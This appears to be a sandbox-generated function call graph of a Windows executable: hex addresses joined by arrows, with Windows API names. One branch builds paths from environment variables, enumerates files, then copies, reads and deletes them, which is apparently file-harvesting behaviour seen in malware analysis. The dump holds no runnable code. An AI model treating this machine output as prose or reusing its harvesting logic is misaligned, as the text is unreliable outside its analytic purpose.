7567->7569 7571 36f770eb 7567->7571 7568 36f74c50 7568->7555 7569->7568 7570 36f770eb 38 API calls 7569->7570 7570->7569 7574 36f77092 7571->7574 7575 36f754a7 38 API calls 7574->7575 7576 36f770a6 7575->7576 7576->7567 7016 36f7281c 7017 36f72882 27 API calls 7016->7017 7018 36f7282a 7017->7018 6025 36f71c5b 6026 36f71c6b 6025->6026 6029 36f712ee 6026->6029 6028 36f71c87 6030 36f71324 6029->6030 6031 36f713b7 GetEnvironmentVariableW 6030->6031 6055 36f710f1 6031->6055 6034 36f710f1 57 API calls 6035 36f71465 6034->6035 6036 36f710f1 57 API calls 6035->6036 6037 36f71479 6036->6037 6038 36f710f1 57 API calls 6037->6038 6039 36f7148d 6038->6039 6040 36f710f1 57 API calls 6039->6040 6041 36f714a1 6040->6041 6042 36f710f1 57 API calls 6041->6042 6043 36f714b5 lstrlenW 6042->6043 6044 36f714d2 6043->6044 6045 36f714d9 lstrlenW 6043->6045 6044->6028 6046 36f710f1 57 API calls 6045->6046 6047 36f71501 lstrlenW lstrcatW 6046->6047 6048 36f710f1 57 API calls 6047->6048 6049 36f71539 lstrlenW lstrcatW 6048->6049 6050 36f710f1 57 API calls 6049->6050 6051 36f7156b lstrlenW lstrcatW 6050->6051 6052 36f710f1 57 API calls 6051->6052 6053 36f7159d lstrlenW lstrcatW 6052->6053 6054 36f710f1 57 API calls 6053->6054 6054->6044 6056 36f71118 6055->6056 6057 36f71129 lstrlenW 6056->6057 6068 36f72c40 6057->6068 6060 36f71177 lstrlenW FindFirstFileW 6062 36f711e1 6060->6062 6063 36f711a0 6060->6063 6061 36f71168 lstrlenW 6061->6060 6062->6034 6064 36f711c7 FindNextFileW 6063->6064 6065 36f711aa 6063->6065 6064->6063 6067 36f711da FindClose 6064->6067 6065->6064 6070 36f71000 6065->6070 6067->6062 6069 36f71148 lstrcatW lstrlenW 6068->6069 6069->6060 6069->6061 6071 36f71022 6070->6071 6072 36f710af 6071->6072 6073 36f7102f lstrcatW lstrlenW 6071->6073 6074 36f710b5 lstrlenW 6072->6074 6085 36f710ad 6072->6085 6075 36f7106b lstrlenW 6073->6075 6076 36f7105a lstrlenW 6073->6076 6101 36f71e16 6074->6101 6087 36f71e89 lstrlenW 6075->6087 6076->6075 6079 36f710ca 6082 36f71e89 5 API calls 6079->6082 6079->6085 6080 36f71088 GetFileAttributesW 6081 36f7109c 6080->6081 6080->6085 6081->6085 6093 36f7173a 6081->6093 6084 36f710df 6082->6084 6106 36f711ea 6084->6106 6085->6065 6088 36f72c40 6087->6088 6089 36f71ea7 lstrcatW lstrlenW 6088->6089 6090 36f71ec2 6089->6090 6091 36f71ed1 lstrcatW 6089->6091 6090->6091 6092 36f71ec7 lstrlenW 6090->6092 6091->6080 6092->6091 6094 36f71747 6093->6094 6121 36f71cca 6094->6121 6097 36f7199f 6097->6085 6099 36f71824 6099->6097 6141 36f715da 6099->6141 6102 36f71e29 6101->6102 6105 36f71e4c 6101->6105 6103 36f71e2d lstrlenW 6102->6103 6102->6105 6104 36f71e3f lstrlenW 6103->6104 6103->6105 6104->6105 6105->6079 6107 36f7120e 6106->6107 6108 36f71e89 5 API calls 6107->6108 6109 36f71220 GetFileAttributesW 6108->6109 6110 36f71246 6109->6110 6111 36f71235 6109->6111 6112 36f71e89 5 API calls 6110->6112 6111->6110 6113 36f7173a 35 API calls 6111->6113 6114 36f71258 6112->6114 6113->6110 6115 36f710f1 56 API calls 6114->6115 6116 36f7126d 6115->6116 6117 36f71e89 5 API calls 6116->6117 6118 36f7127f 6117->6118 6119 36f710f1 56 API calls 6118->6119 6120 36f712e6 6119->6120 6120->6085 6122 36f71cf1 6121->6122 6123 36f71d0f CopyFileW CreateFileW 6122->6123 6124 36f71d55 GetFileSize 6123->6124 6125 36f71d44 DeleteFileW 6123->6125 6126 36f71ede 22 API calls 6124->6126 6130 36f71808 6125->6130 6127 36f71d66 ReadFile 6126->6127 6128 36f71d94 CloseHandle DeleteFileW 6127->6128 6129 36f71d7d CloseHandle DeleteFileW 6127->6129 6128->6130 6129->6130 6130->6097 6131 36f71ede 6130->6131 6133 36f7222f 6131->6133 6134 36f7224e 6133->6134 6136 36f72250 6133->6136 6149 36f7474f 6133->6149 6154 36f747e5 6133->6154 6134->6099 6140 36f72908 6136->6140 6161 36f735d2 6136->6161 6137 36f735d2 RaiseException 6139 36f72925 6137->6139 6139->6099 6140->6137 6142 36f7160c 6141->6142 6143 36f7163c lstrlenW 6142->6143 6249 36f71c9d 6143->6249 6145 36f71655 lstrcatW lstrlenW 6146 36f71678 6145->6146 6147 36f71693 6146->6147 6148 36f7167e lstrcatW 6146->6148 6147->6099 6148->6147 6164 36f74793 6149->6164 6152 36f7478f 6152->6133 6153 36f74765 6170 36f72ada 6153->6170 6156 36f756d0 6154->6156 6155 36f7570e 6183 36f76368 6155->6183 6156->6155 6158 36f756f9 RtlAllocateHeap 6156->6158 6160 36f7474f 7 API calls 6156->6160 6158->6156 6159 36f7570c 6158->6159 6159->6133 6160->6156 6163 36f735f2 RaiseException 6161->6163 6163->6140 6165 36f7479f 6164->6165 6177 36f75671 RtlEnterCriticalSection 6165->6177 6167 36f747aa 6178 36f747dc 6167->6178 6169 36f747d1 6169->6153 6171 36f72ae5 IsProcessorFeaturePresent 6170->6171 6172 36f72ae3 6170->6172 6174 36f72b58 6171->6174 6172->6152 6182 36f72b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6174->6182 6176 36f72c3b 6176->6152 6177->6167 6181 36f756b9 RtlLeaveCriticalSection 6178->6181 6180 36f747e3 6180->6169 6181->6180 6182->6176 6186 36f75b7a GetLastError 6183->6186 6187 36f75b93 6186->6187 6188 36f75b99 6186->6188 6205 36f75e08 6187->6205 6192 36f75bf0 SetLastError 6188->6192 6212 36f7637b 6188->6212 6193 36f75bf9 6192->6193 6193->6159 6194 36f75bb3 6219 36f7571e 6194->6219 6198 36f75bb9 6200 36f75be7 SetLastError 6198->6200 6199 36f75bcf 6232 36f7593c 6199->6232 6200->6193 6203 36f7571e 17 API calls 6204 36f75be0 6203->6204 6204->6192 6204->6200 6237 36f75c45 6205->6237 6207 36f75e2f 6208 36f75e47 TlsGetValue 6207->6208 6209 36f75e3b 6207->6209 6208->6209 6210 36f72ada 5 API calls 6209->6210 6211 36f75e58 6210->6211 6211->6188 6213 36f76388 6212->6213 6214 36f763c8 6213->6214 6215 36f763b3 RtlAllocateHeap 6213->6215 6218 36f7474f 7 API calls 6213->6218 6216 36f76368 19 API calls 6214->6216 6215->6213 6217 36f75bab 6215->6217 6216->6217 6217->6194 6225 36f75e5e 6217->6225 6218->6213 6220 36f75752 6219->6220 6221 36f75729 HeapFree 6219->6221 6220->6198 6221->6220 6222 36f7573e 6221->6222 6223 36f76368 18 API calls 6222->6223 6224 36f75744 GetLastError 6223->6224 6224->6220 6226 36f75c45 5 API calls 6225->6226 6227 36f75e85 6226->6227 6228 36f75ea0 TlsSetValue 6227->6228 6229 36f75e94 6227->6229 6228->6229 6230 36f72ada 5 API calls 6229->6230 6231 36f75bc8 6230->6231 6231->6194 6231->6199 6243 36f75914 6232->6243 6240 36f75c71 6237->6240 6242 36f75c75 6237->6242 6238 36f75c95 6241 36f75ca1 GetProcAddress 6238->6241 6238->6242 6239 36f75ce1 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6239->6240 6240->6238 6240->6239 6240->6242 6241->6242 6242->6207 6244 36f75854 RtlEnterCriticalSection RtlLeaveCriticalSection 6243->6244 6245 36f75938 6244->6245 6246 36f758c4 6245->6246 6247 36f75758 20 API calls 6246->6247 6248 36f758e8 6247->6248 6248->6203 6250 36f71ca6 6249->6250 6250->6145 6842 36f74a9a 6843 36f75411 38 API calls 6842->6843 6844 36f74aa2 6843->6844 7577 36f77bc7 7578 36f77bd3 7577->7578 7579 36f77c0a 7578->7579 7585 36f75671 RtlEnterCriticalSection 7578->7585 7581 36f77be7 7582 36f77f86 20 API calls 7581->7582 7583 36f77bf7 7582->7583 7586 36f77c10 7583->7586 7585->7581 7589 36f756b9 RtlLeaveCriticalSection 7586->7589 7588 36f77c17 7588->7579 7589->7588 7590 36f7a1c6 IsProcessorFeaturePresent 7731 36f7a945 7732 36f7a96d 7731->7732 7733 36f7a9a5 7732->7733 7734 36f7a997 7732->7734 7735 36f7a99e 7732->7735 7737 36f7aa17 21 API calls 7734->7737 7740 36f7aa00 7735->7740 7739 36f7a99c 7737->7739 7741 36f7aa20 7740->7741 7742 36f7b19b 21 API calls 7741->7742 7743 36f7a9a3 7742->7743 7744 36f7af43 7745 36f7af4d 7744->7745 7746 36f7af59 7744->7746 7745->7746 7747 36f7af52 CloseHandle 7745->7747 7747->7746 8081 36f75303 8084 36f750a5 8081->8084 8093 36f7502f 8084->8093 8087 36f7502f 5 API calls 8088 36f750c3 8087->8088 8089 36f75000 20 API calls 8088->8089 8090 36f750ce 8089->8090 8091 36f75000 20 API calls 8090->8091 8092 36f750d9 8091->8092 8096 36f75048 8093->8096 8094 36f72ada 5 API calls 8095 36f75069 8094->8095 8095->8087 8096->8094 8097 36f77103 GetCommandLineA GetCommandLineW 6845 36f77a80 6846 36f77a8d 6845->6846 6847 36f7637b 20 API calls 6846->6847 6848 36f77aa7 6847->6848 6849 36f7571e 20 API calls 6848->6849 6850 36f77ab3 6849->6850 6851 36f7637b 20 API calls 6850->6851 6855 36f77ad9 6850->6855 6852 36f77acd 6851->6852 6854 36f7571e 20 API calls 6852->6854 6854->6855 6856 36f77ae5 6855->6856 6857 36f75eb7 6855->6857 6858 36f75c45 5 API calls 6857->6858 6859 36f75ede 6858->6859 6860 36f75efc InitializeCriticalSectionAndSpinCount 6859->6860 6861 36f75ee7 6859->6861 6860->6861 6862 36f72ada 5 API calls 6861->6862 6863 36f75f13 6862->6863 6863->6855 6963 36f78640 6966 36f78657 6963->6966 6967 36f78665 6966->6967 6968 36f78679 6966->6968 6969 36f76368 20 API calls 6967->6969 6970 36f78693 6968->6970 6971 36f78681 6968->6971 6972 36f7866a 6969->6972 6975 36f754a7 38 API calls 6970->6975 6978 36f78652 6970->6978 6973 36f76368 20 API calls 6971->6973 6976 36f762ac 26 API calls 6972->6976 6974 36f78686 6973->6974 6977 36f762ac 26 API calls 6974->6977 6975->6978 6976->6978 6977->6978 6979 36f7284f 6982 36f72882 6979->6982 6985 36f73550 6982->6985 6984 36f7285d 6986 36f7358a 6985->6986 6987 36f7355d 6985->6987 6986->6984 6987->6986 6988 36f747e5 21 API calls 6987->6988 6989 36f7357a 6988->6989 6989->6986 6990 36f7544d 26 API calls 6989->6990 6990->6986 6991 36f7724e GetProcessHeap 7019 36f7220c 7020 36f72215 7019->7020 7021 36f7221a 7019->7021 7025 36f722b1 7020->7025 7029 36f720db 7021->7029 7024 36f72228 7026 36f722c7 7025->7026 7028 36f722d0 7026->7028 7037 36f72264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7026->7037 7028->7021 7030 36f720e7 7029->7030 7034 36f7210b 7030->7034 7036 36f720f6 7030->7036 7038 36f71eec 7030->7038 7032 36f7216d 7033 36f71eec 50 API calls 7032->7033 7032->7036 7033->7036 7034->7032 7035 36f71eec 50 API calls 7034->7035 7034->7036 7035->7032 7036->7024 7037->7028 7039 36f71ef7 7038->7039 7040 36f71f2a 7038->7040 7042 36f71f1c 7039->7042 7043 36f71efc 7039->7043 7081 36f72049 7040->7081 7063 36f71f3f 7042->7063 7045 36f71f12 7043->7045 7047 36f71f01 7043->7047 7055 36f723ec 7045->7055 7049 36f71f06 7047->7049 7050 36f7240b 7047->7050 7049->7034 7095 36f753e5 7050->7095 7204 36f73513 7055->7204 7060 36f72408 7060->7049 7061 36f7351e 7 API calls 7062 36f723f5 7061->7062 7062->7049 7064 36f71f4b 7063->7064 7222 36f7247c 7064->7222 7066 36f71f52 7067 36f72041 7066->7067 7068 36f71f7c 7066->7068 7075 36f71f57 7066->7075 7245 36f72639 IsProcessorFeaturePresent 7067->7245 7233 36f723de 7068->7233 7071 36f72048 7072 36f71f8b 7072->7075 7236 36f722fc RtlInitializeSListHead 7072->7236 7074 36f71f99 7237 36f746c5 7074->7237 7075->7049 7079 36f71fb8 7079->7075 7080 36f74669 5 API calls 7079->7080 7080->7075 7083 36f72055 7081->7083 7082 36f7205e 7082->7049 7083->7082 7084 36f720d3 7083->7084 7085 36f7207d 7083->7085 7086 36f72639 4 API calls 7084->7086 7322 36f7244c 7085->7322 7088 36f720da 7086->7088 7089 36f72082 7331 36f72308 7089->7331 7091 36f72087 7334 36f720c4 7091->7334 7093 36f7209f 7337 36f7260b 7093->7337 7101 36f75aca 7095->7101 7098 36f7351e 7175 36f73820 7098->7175 7100 36f72415 7100->7049 7102 36f75ad4 7101->7102 7104 36f72410 7101->7104 7103 36f75e08 11 API calls 7102->7103 7105 36f75adb 7103->7105 7104->7098 7105->7104 7106 36f75e5e 11 API calls 7105->7106 7107 36f75aee 7106->7107 7109 36f759b5 7107->7109 7110 36f759d0 7109->7110 7111 36f759c0 7109->7111 7110->7104 7115 36f759d6 7111->7115 7114 36f7571e 20 API calls 7114->7110 7116 36f759ef 7115->7116 7117 36f759e9 7115->7117 7119 36f7571e 20 API calls 7116->7119 7118 36f7571e 20 API calls 7117->7118 7118->7116 7120 36f759fb 7119->7120 7121 36f7571e 20 API calls 7120->7121 7122 36f75a06 7121->7122 7123 36f7571e 20 API calls 7122->7123 7124 36f75a11 7123->7124 7125 36f7571e 20 API calls 7124->7125 7126 36f75a1c 7125->7126 7127 36f7571e 20 API calls 7126->7127 7128 36f75a27 7127->7128 7129 36f7571e 20 API calls 7128->7129 7130 36f75a32 7129->7130 7131 36f7571e 20 API calls 7130->7131 7132 36f75a3d 7131->7132 7133 36f7571e 20 API calls 7132->7133 7134 36f75a48 7133->7134 7135 36f7571e 20 API calls 7134->7135 7136 36f75a56 7135->7136 7141 36f7589c 7136->7141 7147 36f757a8 7141->7147 7143 36f758c0 7144 36f758ec 7143->7144 7159 36f75809 7144->7159 7146 36f75910 7146->7114 7148 36f757b4 7147->7148 7155 36f75671 RtlEnterCriticalSection 7148->7155 7150 36f757e8 7156 36f757fd 7150->7156 7152 36f757be 7152->7150 7154 36f7571e 20 API calls 7152->7154 7153 36f757f5 7153->7143 7154->7150 7155->7152 7157 36f756b9 RtlLeaveCriticalSection 7156->7157 7158 36f75807 7157->7158 7158->7153 7160 36f75815 7159->7160 7167 36f75671 RtlEnterCriticalSection 7160->7167 7162 36f7581f 7168 36f75a7f 7162->7168 7164 36f75832 7172 36f75848 7164->7172 7166 36f75840 7166->7146 7167->7162 7169 36f75a8e 7168->7169 7171 36f75ab5 7168->7171 7170 36f77cc2 20 API calls 7169->7170 7169->7171 7170->7171 7171->7164 7173 36f756b9 RtlLeaveCriticalSection 7172->7173 7174 36f75852 7173->7174 7174->7166 7176 36f7384b 7175->7176 7177 36f7382d 7175->7177 7176->7100 7178 36f7383b 7177->7178 7181 36f73b67 7177->7181 7186 36f73ba2 7178->7186 7191 36f73a82 7181->7191 7183 36f73b81 7184 36f73b99 TlsGetValue 7183->7184 7185 36f73b8d 7183->7185 7184->7185 7185->7178 7187 36f73a82 5 API calls 7186->7187 7188 36f73bbc 7187->7188 7189 36f73bd7 TlsSetValue 7188->7189 7190 36f73bcb 7188->7190 7189->7190 7190->7176 7192 36f73aa6 7191->7192 7193 36f73aaa 7191->7193 7192->7183 7193->7192 7197 36f739be 7193->7197 7196 36f73ac4 GetProcAddress 7196->7192 7202 36f739cd 7197->7202 7198 36f739ea LoadLibraryExW 7200 36f73a05 GetLastError 7198->7200 7198->7202 7199 36f73a77 7199->7192 7199->7196 7200->7202 7201 36f73a60 FreeLibrary 7201->7202 7202->7198 7202->7199 7202->7201 7203 36f73a38 LoadLibraryExW 7202->7203 7203->7202 7210 36f73856 7204->7210 7206 36f723f1 7206->7062 7207 36f753da 7206->7207 7208 36f75b7a 20 API calls 7207->7208 7209 36f723fd 7208->7209 7209->7060 7209->7061 7211 36f73862 GetLastError 7210->7211 7212 36f7385f 7210->7212 7213 36f73b67 6 API calls 7211->7213 7212->7206 7214 36f73877 7213->7214 7215 36f738dc SetLastError 7214->7215 7216 36f73ba2 6 API calls 7214->7216 7221 36f73896 7214->7221 7215->7206 7217 36f73890 7216->7217 7218 36f738b8 7217->7218 7219 36f73ba2 6 API calls 7217->7219 7217->7221 7220 36f73ba2 6 API calls 7218->7220 7218->7221 7219->7218 7220->7221 7221->7215 7223 36f72485 7222->7223 7249 36f72933 IsProcessorFeaturePresent 7223->7249 7227 36f72496 7228 36f7249a 7227->7228 7260 36f753c8 7227->7260 7228->7066 7231 36f724b1 7231->7066 7316 36f724b5 7233->7316 7235 36f723e5 7235->7072 7236->7074 7240 36f746dc 7237->7240 7238 36f72ada 5 API calls 7239 36f71fad 7238->7239 7239->7075 7241 36f723b3 7239->7241 7240->7238 7242 36f723b8 7241->7242 7243 36f72933 IsProcessorFeaturePresent 7242->7243 7244 36f723c1 7242->7244 7243->7244 7244->7079 7246 36f7264e 7245->7246 7247 36f726f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7246->7247 7248 36f72744 7247->7248 7248->7071 7250 36f72491 7249->7250 7251 36f734ea 7250->7251 7252 36f734ef 7251->7252 7271 36f73936 7252->7271 7256 36f73510 7256->7227 7257 36f73505 7257->7256 7285 36f73972 7257->7285 7259 36f734fd 7259->7227 7308 36f77457 7260->7308 7263 36f73529 7264 36f73543 7263->7264 7265 36f73532 7263->7265 7264->7228 7266 36f7391b 6 API calls 7265->7266 7267 36f73537 7266->7267 7268 36f73972 RtlDeleteCriticalSection 7267->7268 7269 36f7353c 7268->7269 7312 36f73c50 7269->7312 7272 36f7393f 7271->7272 7274 36f73968 7272->7274 7276 36f734f9 7272->7276 7289 36f73be0 7272->7289 7275 36f73972 RtlDeleteCriticalSection 7274->7275 7275->7276 7276->7259 7277 36f738e8 7276->7277 7294 36f73af1 7277->7294 7280 36f738fd 7280->7257 7281 36f73ba2 6 API calls 7282 36f7390b 7281->7282 7283 36f73918 7282->7283 7299 36f7391b 7282->7299 7283->7257 7286 36f7399c 7285->7286 7287 36f7397d 7285->7287 7286->7259 7288 36f73987 RtlDeleteCriticalSection 7287->7288 7288->7286 7288->7288 7290 36f73a82 5 API calls 7289->7290 7291 36f73bfa 7290->7291 7292 36f73c18 InitializeCriticalSectionAndSpinCount 7291->7292 7293 36f73c03 7291->7293 7292->7293 7293->7272 7295 36f73a82 5 API calls 7294->7295 7296 36f73b0b 7295->7296 7297 36f73b24 TlsAlloc 7296->7297 7298 36f738f2 7296->7298 7298->7280 7298->7281 7300 36f73925 7299->7300 7301 36f7392b 7299->7301 7303 36f73b2c 7300->7303 7301->7280 7304 36f73a82 5 API calls 7303->7304 7305 36f73b46 7304->7305 7306 36f73b5e TlsFree 7305->7306 7307 36f73b52 7305->7307 7306->7307 7307->7301 7309 36f77470 7308->7309 7310 36f72ada 5 API calls 7309->7310 7311 36f724a3 7310->7311 7311->7231 7311->7263 7313 36f73c7f 7312->7313 7314 36f73c59 7312->7314 7313->7264 7314->7313 7315 36f73c69 FreeLibrary 7314->7315 7315->7314 7317 36f724c4 7316->7317 7318 36f724c8 7316->7318 7317->7235 7319 36f72639 4 API calls 7318->7319 7321 36f724d5 7318->7321 7320 36f72559 7319->7320 7321->7235 7323 36f72451 7322->7323 7324 36f72455 7323->7324 7325 36f72461 7323->7325 7326 36f7527a 20 API calls 7324->7326 7328 36f7246e 7325->7328 7329 36f7499b 28 API calls 7325->7329 7327 36f7245f 7326->7327 7327->7089 7328->7089 7330 36f74bbd 7329->7330 7330->7089 7343 36f734c7 RtlInterlockedFlushSList 7331->7343 7333 36f72312 7333->7091 7345 36f7246f 7334->7345 7336 36f720c9 7336->7093 7338 36f72617 7337->7338 7339 36f7262d 7338->7339 7364 36f753ed 7338->7364 7339->7082 7342 36f73529 8 API calls 7342->7339 7344 36f734d7 7343->7344 7344->7333 7350 36f753ff 7345->7350 7348 36f7391b 6 API calls 7349 36f7354d 7348->7349 7349->7336 7353 36f75c2b 7350->7353 7354 36f75c35 7353->7354 7355 36f72476 7353->7355 7357 36f75db2 7354->7357 7355->7348 7358 36f75c45 5 API calls 7357->7358 7359 36f75dd9 7358->7359 7360 36f75df1 TlsFree 7359->7360 7361 36f75de5 7359->7361 7360->7361 7362 36f72ada 5 API calls 7361->7362 7363 36f75e02 7362->7363 7363->7355 7367 36f774da 7364->7367 7369 36f774f3 7367->7369 7368 36f72ada 5 API calls 7370 36f72625 7368->7370 7369->7368 7370->7342 7591 405b7c lstrlenW 7592 405b8a 7591->7592 7593 405b90 CharPrevW 7592->7593 7594 405b9c 7592->7594 7593->7592 7593->7594 6868 36f78a89 6869 36f76d60 51 API calls 6868->6869 6870 36f78a8e 6869->6870 7748 36f75348 7749 36f73529 8 API calls 7748->7749 7750 36f7534f 7749->7750 7751 36f77b48 7761 36f78ebf 7751->7761 7755 36f77b55 7774 36f7907c 7755->7774 7758 36f77b7f 7759 36f7571e 20 API calls 7758->7759 7760 36f77b8a 7759->7760 7778 36f78ec8 7761->7778 7763 36f77b50 7764 36f78fdc 7763->7764 7765 36f78fe8 7764->7765 7798 36f75671 RtlEnterCriticalSection 7765->7798 7767 36f78ff3 7768 36f7905e 7767->7768 7770 36f79032 RtlDeleteCriticalSection 7767->7770 7799 36f7a09c 7767->7799 7812 36f79073 7768->7812 7772 36f7571e 20 API calls 7770->7772 7772->7767 7773 36f7906a 7773->7755 7775 36f77b64 RtlDeleteCriticalSection 7774->7775 7776 36f79092 7774->7776 7775->7755 7775->7758 7776->7775 7777 36f7571e 20 API calls 7776->7777 7777->7775 7779 36f78ed4 7778->7779 7788 36f75671 RtlEnterCriticalSection 7779->7788 7781 36f78f77 7793 36f78f97 7781->7793 7785 36f78ee3 7785->7781 7787 36f78e78 66 API calls 7785->7787 7789 36f77b94 RtlEnterCriticalSection 7785->7789 7790 36f78f6d 7785->7790 7786 36f78f83 7786->7763 7787->7785 7788->7785 7789->7785 7796 36f77ba8 RtlLeaveCriticalSection 7790->7796 7792 36f78f75 7792->7785 7797 36f756b9 RtlLeaveCriticalSection 7793->7797 7795 36f78f9e 7795->7786 7796->7792 7797->7795 7798->7767 7800 36f7a0a8 7799->7800 7801 36f7a0ce 7800->7801 7802 36f7a0b9 7800->7802 7811 36f7a0c9 7801->7811 7815 36f77b94 RtlEnterCriticalSection 7801->7815 7803 36f76368 20 API calls 7802->7803 7805 36f7a0be 7803->7805 7807 36f762ac 26 API calls 7805->7807 7806 36f7a0ea 7816 36f7a026 7806->7816 7807->7811 7809 36f7a0f5 7832 36f7a112 7809->7832 7811->7767 8080 36f756b9 RtlLeaveCriticalSection 7812->8080 7814 36f7907a 7814->7773 7815->7806 7817 36f7a033 7816->7817 7818 36f7a048 7816->7818 7819 36f76368 20 API calls 7817->7819 7823 36f7a043 7818->7823 7835 36f78e12 7818->7835 7820 36f7a038 7819->7820 7822 36f762ac 26 API calls 7820->7822 7822->7823 7823->7809 7825 36f7907c 20 API calls 7826 36f7a064 7825->7826 7841 36f77a5a 7826->7841 7828 36f7a06a 7848 36f7adce 7828->7848 7831 36f7571e 20 API calls 7831->7823 8079 36f77ba8 RtlLeaveCriticalSection 7832->8079 7834 36f7a11a 7834->7811 7836 36f78e2a 7835->7836 7838 36f78e26 7835->7838 7837 36f77a5a 26 API calls 7836->7837 7836->7838 7839 36f78e4a 7837->7839 7838->7825 7863 36f79a22 7839->7863 7842 36f77a66 7841->7842 7843 36f77a7b 7841->7843 7844 36f76368 20 API calls 7842->7844 7843->7828 7845 36f77a6b 7844->7845 7846 36f762ac 26 API calls 7845->7846 7847 36f77a76 7846->7847 7847->7828 7849 36f7adf2 7848->7849 7850 36f7addd 7848->7850 7851 36f7ae2d 7849->7851 7855 36f7ae19 7849->7855 7852 36f76355 20 API calls 7850->7852 7853 36f76355 20 API calls 7851->7853 7854 36f7ade2 7852->7854 7856 36f7ae32 7853->7856 7857 36f76368 20 API calls 7854->7857 8036 36f7ada6 7855->8036 7859 36f76368 20 API calls 7856->7859 7860 36f7a070 7857->7860 7861 36f7ae3a 7859->7861 7860->7823 7860->7831 7862 36f762ac 26 API calls 7861->7862 7862->7860 7864 36f79a2e 7863->7864 7865 36f79a36 7864->7865 7866 36f79a4e 7864->7866 7888 36f76355 7865->7888 7868 36f79aec 7866->7868 7871 36f79a83 7866->7871 7870 36f76355 20 API calls 7868->7870 7872 36f79af1 7870->7872 7891 36f78c7b RtlEnterCriticalSection 7871->7891 7875 36f76368 20 API calls 7872->7875 7873 36f76368 20 API calls 7882 36f79a43 7873->7882 7877 36f79af9 7875->7877 7876 36f79a89 7878 36f79aa5 7876->7878 7879 36f79aba 7876->7879 7880 36f762ac 26 API calls 7877->7880 7881 36f76368 20 API calls 7878->7881 7892 36f79b0d 7879->7892 7880->7882 7884 36f79aaa 7881->7884 7882->7838 7886 36f76355 20 API calls 7884->7886 7885 36f79ab5 7943 36f79ae4 7885->7943 7886->7885 7889 36f75b7a 20 API calls 7888->7889 7890 36f7635a 7889->7890 7890->7873 7891->7876 7893 36f79b3b 7892->7893 7931 36f79b34 7892->7931 7894 36f79b3f 7893->7894 7895 36f79b5e 7893->7895 7897 36f76355 20 API calls 7894->7897 7898 36f79baf 7895->7898 7899 36f79b92 7895->7899 7896 36f72ada 5 API calls 7900 36f79d15 7896->7900 7901 36f79b44 7897->7901 7903 36f79bc5 7898->7903 7946 36f7a00b 7898->7946 7902 36f76355 20 API calls 7899->7902 7900->7885 7904 36f76368 20 API calls 7901->7904 7906 36f79b97 7902->7906 7949 36f796b2 7903->7949 7908 36f79b4b 7904->7908 7910 36f76368 20 API calls 7906->7910 7911 36f762ac 26 API calls 7908->7911 7914 36f79b9f 7910->7914 7911->7931 7912 36f79bd3 7915 36f79bd7 7912->7915 7916 36f79bf9 7912->7916 7913 36f79c0c 7918 36f79c66 WriteFile 7913->7918 7919 36f79c20 7913->7919 7917 36f762ac 26 API calls 7914->7917 7920 36f79ccd 7915->7920 7956 36f79645 7915->7956 7961 36f79492 GetConsoleCP 7916->7961 7917->7931 7922 36f79c89 GetLastError 7918->7922 7927 36f79bef 7918->7927 7923 36f79c56 7919->7923 7924 36f79c28 7919->7924 7920->7931 7932 36f76368 20 API calls 7920->7932 7922->7927 7987 36f79728 7923->7987 7928 36f79c46 7924->7928 7929 36f79c2d 7924->7929 7927->7920 7927->7931 7935 36f79ca9 7927->7935 7979 36f798f5 7928->7979 7929->7920 7972 36f79807 7929->7972 7931->7896 7934 36f79cf2 7932->7934 7936 36f76355 20 API calls 7934->7936 7937 36f79cc4 7935->7937 7938 36f79cb0 7935->7938 7936->7931 7994 36f76332 7937->7994 7939 36f76368 20 API calls 7938->7939 7941 36f79cb5 7939->7941 7942 36f76355 20 API calls 7941->7942 7942->7931 8035 36f78c9e RtlLeaveCriticalSection 7943->8035 7945 36f79aea 7945->7882 7999 36f79f8d 7946->7999 8021 36f78dbc 7949->8021 7951 36f796c2 7952 36f796c7 7951->7952 7953 36f75af6 38 API calls 7951->7953 7952->7912 7952->7913 7954 36f796ea 7953->7954 7954->7952 7955 36f79708 GetConsoleMode 7954->7955 7955->7952 7959 36f7969f 7956->7959 7960 36f7966a 7956->7960 7957 36f796a1 GetLastError 7957->7959 7958 36f7a181 WriteConsoleW CreateFileW 7958->7960 7959->7927 7960->7957 7960->7958 7960->7959 7962 36f79607 7961->7962 7966 36f794f5 7961->7966 7963 36f72ada 5 API calls 7962->7963 7964 36f79641 7963->7964 7964->7927 7966->7962 7967 36f7957b WideCharToMultiByte 7966->7967 7968 36f779e6 40 API calls 7966->7968 7971 36f795d2 WriteFile 7966->7971 8030 36f77c19 7966->8030 7967->7962 7969 36f795a1 WriteFile 7967->7969 7968->7966 7969->7966 7970 36f7962a GetLastError 7969->7970 7970->7962 7971->7966 7971->7970 7976 36f79816 7972->7976 7973 36f798d8 7974 36f72ada 5 API calls 7973->7974 7978 36f798f1 7974->7978 7975 36f79894 WriteFile 7975->7976 7977 36f798da GetLastError 7975->7977 7976->7973 7976->7975 7977->7973 7978->7927 7986 36f79904 7979->7986 7980 36f79a0f 7981 36f72ada 5 API calls 7980->7981 7982 36f79a1e 7981->7982 7982->7927 7983 36f79986 WideCharToMultiByte 7984 36f79a07 GetLastError 7983->7984 7985 36f799bb WriteFile 7983->7985 7984->7980 7985->7984 7985->7986 7986->7980 7986->7983 7986->7985 7988 36f79737 7987->7988 7989 36f797ea 7988->7989 7990 36f797a9 WriteFile 7988->7990 7991 36f72ada 5 API calls 7989->7991 7990->7988 7993 36f797ec GetLastError 7990->7993 7992 36f79803 7991->7992 7992->7927 7993->7989 7995 36f76355 20 API calls 7994->7995 7996 36f7633d 7995->7996 7997 36f76368 20 API calls 7996->7997 7998 36f76350 7997->7998 7998->7931 8008 36f78d52 7999->8008 8001 36f79f9f 8002 36f79fa7 8001->8002 8003 36f79fb8 SetFilePointerEx 8001->8003 8006 36f76368 20 API calls 8002->8006 8004 36f79fd0 GetLastError 8003->8004 8005 36f79fac 8003->8005 8007 36f76332 20 API calls 8004->8007 8005->7903 8006->8005 8007->8005 8009 36f78d74 8008->8009 8010 36f78d5f 8008->8010 8013 36f76355 20 API calls 8009->8013 8015 36f78d99 8009->8015 8011 36f76355 20 API calls 8010->8011 8012 36f78d64 8011->8012 8014 36f76368 20 API calls 8012->8014 8016 36f78da4 8013->8016 8018 36f78d6c 8014->8018 8015->8001 8017 36f76368 20 API calls 8016->8017 8019 36f78dac 8017->8019 8018->8001 8020 36f762ac 26 API calls 8019->8020 8020->8018 8022 36f78dd6 